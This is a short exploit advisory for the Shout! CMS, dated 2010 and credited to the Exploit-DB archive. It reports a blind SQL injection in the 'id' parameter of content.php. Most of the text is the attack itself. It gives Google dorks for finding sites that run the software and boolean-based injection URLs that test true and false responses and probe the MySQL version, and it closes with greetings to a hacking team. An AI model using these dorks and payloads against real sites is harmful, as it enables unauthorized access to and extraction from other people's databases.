ShoutCMS – ‘content.php’ Blind SQL Injection - 体验盒子

作者： Zero Cold

日期： 2010-02-01

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11305/

Shout! (content.php) Blind Sql Injection Vulnerability
=======================================================

####################################################################
.:. Author : Zero Cold [zero-cold@msn.com]

.:. Team : Sec Attack Team

.:. Home : www.sec-attack.com/vb

.:. Script : Shout! Script

.:. Vendor : http://www.mediashaker.com/index.php

.:. Bug Type : Blind Sql Injection

.:. Dork : [1] "Powered by Shout!"
 [2] intitle:"Shout" inurl:"admindex.php"

####################################################################

===[ Exploit ]===

www.site.com/content.php?id=54+and+1=1 >>> True
www.site.com/content.php?id=54+and+1=2 >>> False


www.site.com/content.php?id=54+and substring(@@version,1,1)=4>>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5>>> False



####################################################################

Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack